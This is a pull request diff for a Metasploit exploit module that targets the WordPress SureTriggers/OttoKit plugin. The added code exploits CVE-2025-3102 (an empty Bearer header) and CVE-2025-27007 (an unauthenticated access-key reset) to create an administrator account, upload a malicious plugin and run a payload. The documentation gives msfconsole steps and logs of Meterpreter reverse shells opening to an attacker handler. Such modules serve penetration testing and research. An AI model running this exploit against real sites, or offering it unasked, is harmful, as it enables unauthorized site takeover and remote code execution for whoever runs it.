### PR TITLE
Add CVE-2025-27007 in existing `exploit(multi/http/wp_suretriggers_auth_bypass)` module

### DIFF
--- a/documentation/modules/exploit/multi/http/wp_suretriggers_auth_bypass.md
+++ b/documentation/modules/exploit/multi/http/wp_suretriggers_auth_bypass.md
@@ -1,17 +1,28 @@
 ## Vulnerable Application
 
-This Metasploit module exploits an administrative user creation vulnerability in the
-WordPress SureTriggers plugin, versions <= 1.0.78 (CVE-2025-3102).
-The plugin exposes an unauthenticated REST endpoint (`automation/action`) that allows
-bypassing permission checks to create a new administrator account.
+This Metasploit module exploits administrative user creation vulnerabilities in the
+WordPress SureTriggers/OttoKit plugin:
 
-To replicate a vulnerable environment for testing:
+* **CVE-2025-3102** (≤ 1.0.78): unauthenticated admin creation via the `automation/action`
+REST endpoint with an empty `St-Authorization: Bearer ` header.
+* **CVE-2025-27007** (≤ 1.0.82): unauthenticated reset of the access key via the `connection/create-wp-connection` endpoint,
+followed by admin creation using `St-Authorization: Bearer <NEW_KEY>`.
 
-1. Install WordPress using the provided Docker Compose configuration.
-2. Download and install the SureTriggers plugin v1.0.78:
-   [https://downloads.wordpress.org/plugin/suretriggers.1.0.78.zip](https://downloads.wordpress.org/plugin/suretriggers.1.0.78.zip)
-3. Verify that the plugin is activated and accessible on the local network.
-4. No further configuration is required; vulnerability is present immediately upon activation.
+### To replicate vulnerable environments
+
+1. **SureTriggers v1.0.78 (CVE-2025-3102)**
+
+   * Download & install plugin v1.0.78:
+     `https://downloads.wordpress.org/plugin/suretriggers.1.0.78.zip`
+   * No additional setup is required; the bypass works immediately upon activation.
+
+2. **SureTriggers v1.0.82 (CVE-2025-27007)**
+
+   * Download & install plugin v1.0.82:
+     `https://downloads.wordpress.org/plugin/suretriggers.1.0.82.zip`
+   * No secret key is needed; the exploit will reset it to the specified value.
+
+Both scenarios can be deployed via Docker Compose.
 
 ## Docker Compose Configuration
 
@@ -62,131 +73,168 @@ post_max_size = 64M
 ```bash
 docker-compose up -d
 ```
-
-2. Complete WordPress setup at [http://localhost:5555](http://localhost:5555)
-3. Confirm that SureTriggers v1.0.78 is active under **Plugins**
-4. Launch `msfconsole`
-5. Load the module:
+2. Complete WordPress setup at [http://localhost:5555](http://localhost:5555).
+3. Confirm the targeted SureTriggers version is active under **Plugins**.
+4. In `msfconsole`:
 
 ```bash
 use exploit/multi/http/wp_suretriggers_auth_bypass
-```
-
-6. Set `RHOSTS` to the target IP
-7. Optionally set `ST_AUTH` if you have an existing key
-8. Configure `WP_USER`, `WP_PASS`, `WP_EMAIL`
-9. Execute the exploit with `run`
-
-## Options
-
-* **RHOSTS**: Target IP address or hostname where WordPress is running.
-* **TARGETURI**: Base path to the WordPress installation (default is `/`).
-* **WP_USER**, **WP_PASS**, **WP_EMAIL**: Credentials for the new administrator account that the exploit will create.
-  By default these are randomly generated but you can set them to values of your choice, for example:
-
-```bash
+set RHOSTS 127.0.0.1
+set TARGETURI /
 set WP_USER eviladmin
 set WP_PASS Str0ngP@ss!
 set WP_EMAIL eviladmin@example.com
 ```
 
-* **ST_AUTH**: *(Optional)* If you have the plugin’s secret key (used in the `st_authorization` header),
-  you can provide it here to authenticate the REST request.
-  If left empty the module will send an empty header value, which still works on versions <= 1.0.78.
+## Options
+
+* **WP_USER**, **WP_PASS**, **WP_EMAIL**: New administrator credentials (random by default).
+* **ST_AUTH**: *(Optional)* Value for `St-Authorization` header (used by CVE-2025-3102; default empty).
+* **ACCESS_KEY**: *(Optional)* Key to reset for CVE-2025-27007 (random by default).
+* **ACTION**: Exploit to perform:
+
+  * `CVE-2025-3102`
+  * `CVE-2025-27007`
 
 ## Scenarios
 
-### Successful Exploitation Against SureTriggers v1.0.78
+### CVE-2025-3102: Empty Bearer Admin Creation
 
-**Setup:**
+1. Ensure SureTriggers v1.0.78 is active.
+2. In `msfconsole`, set:
 
-* Local WordPress instance with SureTriggers v1.0.78
-* Metasploit Framework
-
-**Steps:**
-
-1. Start `msfconsole`
-
-2. Load the module:
 ```bash
-use exploit/multi/http/wp_suretriggers_auth_bypass
+set ACTION CVE-2025-3102
 ```
-3. Configure:
-```bash
-set RHOSTS 127.0.0.1
-set TARGETURI /
-set WP_USER eviladmin
-set WP_PASS Str0ngP@ss!
-run
-```
+3. Run the module: it will send an empty `St-Authorization: Bearer ` header to `/wp-json/sure-triggers/v1/automation/action`.
+4. New administrator is created; payload is uploaded and executed.
 
-**Expected Results**:
+### CVE-2025-27007: Reset Access Key & Admin Creation
+
+1. Ensure SureTriggers v1.0.82 is active.
+2. In `msfconsole`, set:
+
+```bash
+set ACTION CVE-2025-27007
+```
+3. Run the module: it will call `/wp-json/sure-triggers/v1/connection/create-wp-connection` to reset the key, then use
+   `St-Authorization: Bearer mynewkey123` against `/wp-json/sure-triggers/v1/automation/action`.
+4. New administrator is created; payload is uploaded and executed.
+
+
+### Expected Results (CVE-2025-3102)
 
 With `php/meterpreter/reverse_tcp`:
 
 ```plaintext
-msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://127.0.0.1:5555
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
 [*] Started reverse TCP handler on 192.168.1.36:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] Detected WordPress version: 6.3.2
-[+] Detected suretriggers plugin version: 1.0.78
-[+] The target appears to be vulnerable.
-[*] Attempting to create administrator user via auth bypass...
-[!] Primary endpoint failed or did not return success, trying fallback via rest_route...
-[+] Administrator created: sol_bash:k9R0ZwjRX5VBOBJ
+[*] Detected WordPress version: 6.8.1
+[+] The target appears to be vulnerable. Detected suretriggers version 1.0.78 (vulnerable to CVE-2025-3102)
+[*] CVE-2025-3102: creating admin via St-Authorization Bearer (empty)
+[+] Admin created: zGrsYO:8XL0pZKjN7pc
 [*] Uploading malicious plugin for code execution...
-[*] Executing payload at /wp-content/plugins/wp_p2ash/ajax_efdsa.php...
-[*] Sending stage (40004 bytes) to 172.27.0.2
-[+] Deleted ajax_efdsa.php
-[+] Deleted wp_p2ash.php
-[+] Deleted ../wp_p2ash
-[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 172.27.0.2:33924) at 2025-05-07 17:22:49 +0200
+[*] Executing payload at /wp-content/plugins/wp_63rkh/ajax_fybgc.php...
+[*] Sending stage (40004 bytes) to 172.27.0.3
+[+] Deleted ajax_fybgc.php
+[+] Deleted wp_63rkh.php
+[+] Deleted ../wp_63rkh
+[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.27.0.3:51410) at 2025-05-14 19:00:30 +0200
 
 meterpreter > sysinfo
-Computer    : a6e792b1c252
-OS          : Linux a6e792b1c252 6.14.2-2-cachyos #1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 17:27:10 +0000 x86_64
+Computer    : 396e678f2510
+OS          : Linux 396e678f2510 6.14.2-2-cachyos #1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 17:27:10 +0000 x86_64
 Meterpreter : php/linux
 ```
 
 With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
 
 ```plaintext
-msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > show targets
-
-Exploit targets:
-=================
-
-    Id  Name
-    --  ----
-=>  0   PHP In-Memory
-    1   Unix In-Memory
-    2   Windows In-Memory
-
-
 msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set target 1
 target => 1
 msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
 payload => cmd/linux/http/x64/meterpreter/reverse_tcp
-msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://127.0.0.1:5555
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
 [*] Started reverse TCP handler on 192.168.1.36:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] Detected WordPress version: 6.3.2
-[+] Detected suretriggers plugin version: 1.0.78
-[+] The target appears to be vulnerable.
-[*] Attempting to create administrator user via auth bypass...
-[!] Primary endpoint failed or did not return success, trying fallback via rest_route...
-[+] Administrator created: sol_bash:k9R0ZwjRX5VBOBJ
+[*] Detected WordPress version: 6.8.1
+[+] The target appears to be vulnerable. Detected suretriggers version 1.0.78 (vulnerable to CVE-2025-3102)
+[*] CVE-2025-3102: creating admin via St-Authorization Bearer (empty)
+[+] Admin created: zGrsYO:8XL0pZKjN7pc
 [*] Uploading malicious plugin for code execution...
-[*] Executing payload at /wp-content/plugins/wp_ppqii/ajax_cqc8l.php...
-[*] Sending stage (3045380 bytes) to 172.27.0.2
-[+] Deleted ajax_cqc8l.php
-[+] Deleted wp_ppqii.php
-[+] Deleted ../wp_ppqii
-[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 172.27.0.2:54238) at 2025-05-07 17:24:10 +0200
+[*] Executing payload at /wp-content/plugins/wp_exf15/ajax_tpfd9.php...
+[*] Sending stage (3045380 bytes) to 172.27.0.3
+[+] Deleted ajax_tpfd9.php
+[+] Deleted wp_exf15.php
+[+] Deleted ../wp_exf15
+[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 172.27.0.3:53324) at 2025-05-14 19:02:06 +0200
 
 meterpreter > sysinfo
-Computer     : 172.27.0.2
-OS           : Debian 11.8 (Linux 6.14.2-2-cachyos)
+Computer     : 172.27.0.3
+OS           : Debian 12.10 (Linux 6.14.2-2-cachyos)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+### Expected Results (CVE-2025-27007)
+
+With `php/meterpreter/reverse_tcp`:
+
+```plaintext
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set action CVE-2025-27007
+action => CVE-2025-27007
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
+[*] Started reverse TCP handler on 192.168.1.36:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Detected WordPress version: 6.8.1
+[+] The target appears to be vulnerable. Detected suretriggers version 1.0.82 (vulnerable to CVE-2025-27007)
+[*] CVE-2025-27007: reset access key & create admin
+[*] Resetting access key
+[+] Access key reset successful
+[+] Admin created: pAEaR3:98TCYzILsdXt
+[*] Uploading malicious plugin for code execution...
+[*] Executing payload at /wp-content/plugins/wp_14slj/ajax_drh8b.php...
+[*] Sending stage (40004 bytes) to 172.27.0.3
+[+] Deleted ajax_drh8b.php
+[+] Deleted wp_14slj.php
+[+] Deleted ../wp_14slj
+[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.27.0.3:42464) at 2025-05-14 19:05:06 +0200
+
+meterpreter > sysinfo
+Computer    : 396e678f2510
+OS          : Linux 396e678f2510 6.14.2-2-cachyos #1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 17:27:10 +0000 x86_64
+Meterpreter : php/linux
+```
+
+With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
+
+```plaintext
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set target 1
+target => 1
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
+[*] Started reverse TCP handler on 192.168.1.36:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Detected WordPress version: 6.8.1
+[+] The target appears to be vulnerable. Detected suretriggers version 1.0.82 (vulnerable to CVE-2025-27007)
+[*] CVE-2025-27007: reset access key & create admin
+[*] Resetting access key
+[+] Access key reset successful
+[+] Admin created: pAEaR3:98TCYzILsdXt
+[*] Uploading malicious plugin for code execution...
+[*] Executing payload at /wp-content/plugins/wp_c7ziw/ajax_a9arm.php...
+[*] Sending stage (3045380 bytes) to 172.27.0.3
+[+] Deleted ajax_a9arm.php
+[+] Deleted wp_c7ziw.php
+[+] Deleted ../wp_c7ziw
+[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 172.27.0.3:54362) at 2025-05-14 19:06:04 +0200
+
+meterpreter > sysinfo
+Computer     : 172.27.0.3
+OS           : Debian 12.10 (Linux 6.14.2-2-cachyos)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux

--- a/documentation/modules/exploit/multi/http/wp_suretriggers_auth_bypass.md
+++ b/documentation/modules/exploit/multi/http/wp_suretriggers_auth_bypass.md
@@ -4,7 +4,7 @@ This Metasploit module exploits administrative user creation vulnerabilities in 
 WordPress SureTriggers/OttoKit plugin:
 
 * **CVE-2025-3102** (≤ 1.0.78): unauthenticated admin creation via the `automation/action`
-REST endpoint with an empty `St-Authorization: Bearer ` header.
+REST endpoint with an empty `St-Authorization: Bearer` header.
 * **CVE-2025-27007** (≤ 1.0.82): unauthenticated reset of the access key via the `connection/create-wp-connection` endpoint,
 followed by admin creation using `St-Authorization: Bearer <NEW_KEY>`.
 

--- a/documentation/modules/exploit/multi/http/wp_suretriggers_auth_bypass.md
+++ b/documentation/modules/exploit/multi/http/wp_suretriggers_auth_bypass.md
@@ -127,30 +127,33 @@ set ACTION CVE-2025-27007
 With `php/meterpreter/reverse_tcp`:
 
 ```plaintext
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set action CVE-2025-3102
+action => CVE-2025-3102
 msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
 [*] Started reverse TCP handler on 192.168.1.36:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Detected WordPress version: 6.8.1
-[+] The target appears to be vulnerable. Detected suretriggers version 1.0.78 (vulnerable to CVE-2025-3102)
-[*] CVE-2025-3102: creating admin via St-Authorization Bearer (empty)
-[+] Admin created: zGrsYO:8XL0pZKjN7pc
+[+] The target appears to be vulnerable. Detected suretriggers 1.0.78 vulnerable to CVE-2025-3102
+[+] Admin created: warner:Q0bTyYI43H8g
 [*] Uploading malicious plugin for code execution...
-[*] Executing payload at /wp-content/plugins/wp_63rkh/ajax_fybgc.php...
+[*] Executing payload at /wp-content/plugins/wp_hkc1z/ajax_kq8xu.php...
 [*] Sending stage (40004 bytes) to 172.27.0.3
-[+] Deleted ajax_fybgc.php
-[+] Deleted wp_63rkh.php
-[+] Deleted ../wp_63rkh
-[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.27.0.3:51410) at 2025-05-14 19:00:30 +0200
+[+] Deleted ajax_kq8xu.php
+[+] Deleted wp_hkc1z.php
+[+] Deleted ../wp_hkc1z
+[*] Meterpreter session 6 opened (192.168.1.36:4444 -> 172.27.0.3:43702) at 2025-05-21 19:35:49 +0200
 
 meterpreter > sysinfo
 Computer    : 396e678f2510
-OS          : Linux 396e678f2510 6.14.2-2-cachyos #1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 17:27:10 +0000 x86_64
+OS          : Linux 396e678f2510 6.14.6-2-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 10 May 2025 20:09:10 +0000 x86_64
 Meterpreter : php/linux
 ```
 
 With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
 
 ```plaintext
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set action CVE-2025-3102
+action => CVE-2025-3102
 msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set target 1
 target => 1
 msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
@@ -159,20 +162,19 @@ msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
 [*] Started reverse TCP handler on 192.168.1.36:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Detected WordPress version: 6.8.1
-[+] The target appears to be vulnerable. Detected suretriggers version 1.0.78 (vulnerable to CVE-2025-3102)
-[*] CVE-2025-3102: creating admin via St-Authorization Bearer (empty)
-[+] Admin created: zGrsYO:8XL0pZKjN7pc
+[+] The target appears to be vulnerable. Detected suretriggers 1.0.78 vulnerable to CVE-2025-3102
+[+] Admin created: warner:Q0bTyYI43H8g
 [*] Uploading malicious plugin for code execution...
-[*] Executing payload at /wp-content/plugins/wp_exf15/ajax_tpfd9.php...
+[*] Executing payload at /wp-content/plugins/wp_xtndd/ajax_bmjl3.php...
 [*] Sending stage (3045380 bytes) to 172.27.0.3
-[+] Deleted ajax_tpfd9.php
-[+] Deleted wp_exf15.php
-[+] Deleted ../wp_exf15
-[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 172.27.0.3:53324) at 2025-05-14 19:02:06 +0200
+[+] Deleted ajax_bmjl3.php
+[+] Deleted wp_xtndd.php
+[+] Deleted ../wp_xtndd
+[*] Meterpreter session 7 opened (192.168.1.36:4444 -> 172.27.0.3:35176) at 2025-05-21 19:36:44 +0200
 
 meterpreter > sysinfo
 Computer     : 172.27.0.3
-OS           : Debian 12.10 (Linux 6.14.2-2-cachyos)
+OS           : Debian 12.10 (Linux 6.14.6-2-cachyos)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
@@ -189,22 +191,21 @@ msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
 [*] Started reverse TCP handler on 192.168.1.36:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Detected WordPress version: 6.8.1
-[+] The target appears to be vulnerable. Detected suretriggers version 1.0.82 (vulnerable to CVE-2025-27007)
-[*] CVE-2025-27007: reset access key & create admin
+[+] The target appears to be vulnerable. Detected suretriggers 1.0.82 vulnerable to CVE-2025-27007
 [*] Resetting access key
 [+] Access key reset successful
-[+] Admin created: pAEaR3:98TCYzILsdXt
+[+] Admin created: warner:Q0bTyYI43H8g
 [*] Uploading malicious plugin for code execution...
-[*] Executing payload at /wp-content/plugins/wp_14slj/ajax_drh8b.php...
+[*] Executing payload at /wp-content/plugins/wp_kbl7m/ajax_awg0f.php...
 [*] Sending stage (40004 bytes) to 172.27.0.3
-[+] Deleted ajax_drh8b.php
-[+] Deleted wp_14slj.php
-[+] Deleted ../wp_14slj
-[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.27.0.3:42464) at 2025-05-14 19:05:06 +0200
+[+] Deleted ajax_awg0f.php
+[+] Deleted wp_kbl7m.php
+[+] Deleted ../wp_kbl7m
+[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 172.27.0.3:52622) at 2025-05-21 19:31:04 +0200
 
 meterpreter > sysinfo
 Computer    : 396e678f2510
-OS          : Linux 396e678f2510 6.14.2-2-cachyos #1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 17:27:10 +0000 x86_64
+OS          : Linux 396e678f2510 6.14.6-2-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 10 May 2025 20:09:10 +0000 x86_64
 Meterpreter : php/linux
 ```
 
@@ -219,22 +220,21 @@ msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
 [*] Started reverse TCP handler on 192.168.1.36:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Detected WordPress version: 6.8.1
-[+] The target appears to be vulnerable. Detected suretriggers version 1.0.82 (vulnerable to CVE-2025-27007)
-[*] CVE-2025-27007: reset access key & create admin
+[+] The target appears to be vulnerable. Detected suretriggers 1.0.82 vulnerable to CVE-2025-27007
 [*] Resetting access key
 [+] Access key reset successful
-[+] Admin created: pAEaR3:98TCYzILsdXt
+[+] Admin created: warner:Q0bTyYI43H8g
 [*] Uploading malicious plugin for code execution...
-[*] Executing payload at /wp-content/plugins/wp_c7ziw/ajax_a9arm.php...
+[*] Executing payload at /wp-content/plugins/wp_uozfu/ajax_cqg9q.php...
 [*] Sending stage (3045380 bytes) to 172.27.0.3
-[+] Deleted ajax_a9arm.php
-[+] Deleted wp_c7ziw.php
-[+] Deleted ../wp_c7ziw
-[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 172.27.0.3:54362) at 2025-05-14 19:06:04 +0200
+[+] Deleted ajax_cqg9q.php
+[+] Deleted wp_uozfu.php
+[+] Deleted ../wp_uozfu
+[*] Meterpreter session 5 opened (192.168.1.36:4444 -> 172.27.0.3:56038) at 2025-05-21 19:33:42 +0200
 
 meterpreter > sysinfo
 Computer     : 172.27.0.3
-OS           : Debian 12.10 (Linux 6.14.2-2-cachyos)
+OS           : Debian 12.10 (Linux 6.14.6-2-cachyos)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux

--- a/modules/exploits/multi/http/wp_suretriggers_auth_bypass.rb
+++ b/modules/exploits/multi/http/wp_suretriggers_auth_bypass.rb
@@ -17,21 +17,25 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'WordPress SureTriggers Auth Bypass and RCE',
+        'Name' => 'WordPress SureTriggers/OttoKit Combined Auth Bypass (CVE-2025-3102, CVE-2025-27007)',
         'Description' => %q{
-          This module exploits an authorization bypass in the WordPress SureTriggers plugin (<= 1.0.78).
-          It first creates a new administrator account via the unauthenticated REST endpoint,
-          then uploads and executes a PHP payload using FileDropper for remote code execution.
+          Exploits two distinct authorization bypasses in SureTriggers/OttoKit plugin:
+          - CVE-2025-3102: admin creation via St-Authorization Bearer (empty)
+          - CVE-2025-27007: reset access key via connection endpoint & admin creation with Bearer header
         },
         'Author' => [
-          'Michael Mazzolini (mikemyers)', # Vulnerability Discovery
-          'Khaled Alenazi (Nxploited)',    # PoC
-          'Valentin Lobstein'              # Metasploit module
+          'Michael Mazzolini (mikemyers)',  # Vulnerability discovery (CVE-2025-3102)
+          'Denver Jackson',                 # Vulnerability discovery (CVE-2025-27007)
+          'Khaled Alenazi (Nxploited)',     # PoC (CVE-2025-3102)
+          'Valentin Lobstein',              # Metasploit module
         ],
         'References' => [
           ['CVE', '2025-3102'],
+          ['CVE', '2025-27007'],
           ['URL', 'https://github.com/Nxploited/CVE-2025-3102'],
-          ['URL', 'https://www.wordfence.com/blog/2025/04/100000-wordpress-sites-affected-by-administrative-user-creation-vulnerability-in-suretriggers-wordpress-plugin/']
+          ['URL', 'https://www.wordfence.com/blog/2025/04/100000-wordpress-sites-affected-by-administrative-user-creation-vulnerability-in-suretriggers-wordpress-plugin/'],
+          ['URL', 'https://patchstack.com/articles/additional-critical-ottokit-formerly-suretriggers-vulnerability-patched?_s_id=cve'],
+          ['URL', 'https://cloud.projectdiscovery.io/library/CVE-2025-27007']
         ],
         'License' => MSF_LICENSE,
         'Privileged' => false,
@@ -70,14 +74,15 @@ class MetasploitModule < Msf::Exploit::Remote
           'Reliability' => [REPEATABLE_SESSION]
         }
       )
-      )
+    )
 
     register_options(
       [
         OptString.new('WP_USER', [true, 'Username for the new administrator', Faker::Internet.username(specifier: 5..8)]),
         OptString.new('WP_PASS', [true, 'Password for the new administrator', Faker::Internet.password(min_length: 12)]),
         OptString.new('WP_EMAIL', [true, 'Email for the new administrator', Faker::Internet.email(name: Faker::Internet.username(specifier: 5..8))]),
-        OptString.new('ST_AUTH', [false, 'Value for st_authorization header', ''])
+        OptString.new('ST_AUTH', [false, 'St-Authorization header', Rex::Text.rand_text_alphanumeric(16)]),
+        OptString.new('ACTION', [true, 'Action to perform (CVE-2025-3102 or CVE-2025-27007)', 'CVE-2025-3102']),
       ]
     )
   end
@@ -89,54 +94,146 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Detected WordPress version: #{wp_version}") if wp_version
 
     plugin = 'suretriggers'
-    readme = check_plugin_version_from_readme(plugin, '1.0.79', '0.0.1')
-    detected = readme&.details&.dig(:version)
-
-    if detected.nil?
+    readme = check_plugin_version_from_readme(plugin, '1.0.82')
+    version = readme&.details&.dig(:version)
+    unless version
       return CheckCode::Unknown("Unable to determine the #{plugin} plugin version.")
     end
 
-    detected_version = Rex::Version.new(detected)
-
-    if detected_version <= Rex::Version.new('1.0.78')
-      return CheckCode::Appears("Detected #{plugin} version #{detected_version}")
+    detected = Rex::Version.new(version)
+    if detected <= Rex::Version.new('1.0.78')
+      return CheckCode::Appears("Detected #{plugin} version #{detected} (vulnerable to CVE-2025-3102)")
+    elsif detected <= Rex::Version.new('1.0.82')
+      return CheckCode::Appears("Detected #{plugin} version #{detected} (vulnerable to CVE-2025-27007)")
+    else
+      return CheckCode::Safe("Detected #{plugin} version #{detected} (appears patched)")
     end
-
-    CheckCode::Safe("#{plugin} #{detected_version} >= 1.0.79 appears patched")
   end
 
   def exploit
-    print_status('Attempting to create administrator user via auth bypass...')
+    action = datastore['ACTION'].to_s.upcase
+    case action
+    when 'CVE-2025-3102'
+      exploit_cve3102
+    when 'CVE-2025-27007'
+      exploit_cve27007
+    else
+      fail_with(Failure::BadConfig, "Unknown action: #{datastore['ACTION']}")
+    end
+  end
 
-    create_uri = normalize_uri(target_uri.path, 'wp-json', 'sure-triggers', 'v1', 'automation', 'action')
-    headers = { 'st_authorization' => datastore['ST_AUTH'] }
-    payload = user_payload.to_json
+  def exploit_cve3102
+    print_status('CVE-2025-3102: creating admin via St-Authorization Bearer (empty)')
+    uri = normalize_uri(target_uri.path, 'wp-json', 'sure-triggers', 'v1', 'automation', 'action')
+    headers = { 'St-Authorization' => 'Bearer ' }
 
     res = send_request_cgi(
       'method' => 'POST',
-      'uri' => create_uri,
+      'uri' => uri,
       'ctype' => 'application/json',
-      'data' => payload,
+      'data' => user_payload.to_json,
       'headers' => headers
     )
-
     unless res&.code == 200 && res.get_json_document&.dig('success')
-      print_warning('Primary endpoint failed, trying fallback via rest_route...')
+      vprint_warning('Primary endpoint failed, trying fallback via rest_route...')
       res = send_request_cgi(
         'method' => 'POST',
         'uri' => normalize_uri(target_uri.path),
         'vars_get' => { 'rest_route' => '/sure-triggers/v1/automation/action' },
         'ctype' => 'application/json',
-        'data' => payload,
+        'data' => user_payload.to_json,
         'headers' => headers
       )
     end
+    fail_with(Failure::UnexpectedReply, 'CVE-2025-3102: user creation failed') unless res&.code == 200 && res.get_json_document&.dig('success')
 
+    finalize_admin
+    cookie = wordpress_login(datastore['WP_USER'], datastore['WP_PASS'])
+    upload_and_execute_payload(cookie)
+  end
+
+  def exploit_cve27007
+    print_status('CVE-2025-27007: reset access key & create admin')
+    reset_access_key
+
+    uri = normalize_uri(target_uri.path, 'wp-json', 'sure-triggers', 'v1', 'automation', 'action')
+    headers = { 'St-Authorization' => "Bearer #{datastore['ST_AUTH']}" }
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => uri,
+      'ctype' => 'application/json',
+      'data' => user_payload.to_json,
+      'headers' => headers
+    )
     unless res&.code == 200 && res.get_json_document&.dig('success')
-      fail_with(Failure::UnexpectedReply, 'User creation did not return success')
+      vprint_warning('Primary endpoint failed, trying fallback via rest_route...')
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path),
+        'vars_get' => { 'rest_route' => '/sure-triggers/v1/automation/action' },
+        'ctype' => 'application/json',
+        'data' => user_payload.to_json,
+        'headers' => headers
+      )
     end
+    fail_with(Failure::UnexpectedReply, 'CVE-2025-27007: user creation failed') unless res&.code == 200 && res.get_json_document&.dig('success')
 
-    print_good("Administrator created: #{datastore['WP_USER']}:#{datastore['WP_PASS']}")
+    finalize_admin
+    cookie = wordpress_login(datastore['WP_USER'], datastore['WP_PASS'])
+    upload_and_execute_payload(cookie)
+  end
+
+  def reset_access_key
+    print_status('Resetting access key')
+    uri = normalize_uri(target_uri.path, 'wp-json', 'sure-triggers', 'v1', 'connection', 'create-wp-connection')
+    body = {
+      'sure-triggers-access-key' => datastore['ST_AUTH'],
+      'wp-password' => datastore['WP_PASS'],
+      'connection_status' => 'ok',
+      'wp-username' => datastore['WP_USER'],
+      'connected_email' => datastore['WP_EMAIL']
+    }.to_json
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => uri,
+      'ctype' => 'application/json',
+      'data' => body,
+      'headers' => { 'User-Agent' => 'OttoKit' }
+    )
+    unless res&.code == 200 && res.get_json_document&.dig('success')
+      vprint_warning('Primary endpoint failed, trying fallback via rest_route...')
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path),
+        'vars_get' => { 'rest_route' => '/sure-triggers/v1/connection/create-wp-connection' },
+        'ctype' => 'application/json',
+        'data' => body,
+        'headers' => { 'User-Agent' => 'OttoKit' }
+      )
+    end
+    fail_with(Failure::UnexpectedReply, 'Key reset failed') unless res&.code == 200 && res.get_json_document&.dig('success')
+    print_good('Access key reset successful')
+  end
+
+  def user_payload
+    {
+      'integration' => 'WordPress',
+      'type_event' => 'create_user_if_not_exists',
+      'selected_options' => {
+        'user_name' => datastore['WP_USER'],
+        'password' => datastore['WP_PASS'],
+        'user_email' => datastore['WP_EMAIL'],
+        'role' => 'administrator'
+      },
+      'fields' => [],
+      'context' => {}
+    }
+  end
+
+  def finalize_admin
+    print_good("Admin created: #{datastore['WP_USER']}:#{datastore['WP_PASS']}")
 
     create_credential(
       workspace_id: myworkspace_id,
@@ -151,7 +248,6 @@ class MetasploitModule < Msf::Exploit::Remote
       protocol: 'tcp',
       status: Metasploit::Model::Login::Status::UNTRIED
     )
-
     vprint_good("Credential for user '#{datastore['WP_USER']}' stored successfully.")
 
     loot_data = "Username: #{datastore['WP_USER']}, Password: #{datastore['WP_PASS']}\n"
@@ -179,28 +275,10 @@ class MetasploitModule < Msf::Exploit::Remote
       host: datastore['RHOST'],
       port: datastore['RPORT'],
       proto: 'tcp',
-      name: 'SureTriggers WordPress Plugin Auth Bypass',
+      name: 'SureTriggers Auth Bypass',
       refs: references,
-      info: 'Unauthenticated admin creation via vulnerable REST API endpoint'
+      info: 'Unauthenticated admin creation via SureTriggers plugin'
     )
-
-    cookie = wordpress_login(datastore['WP_USER'], datastore['WP_PASS'])
-    upload_and_execute_payload(cookie)
-  end
-
-  def user_payload
-    {
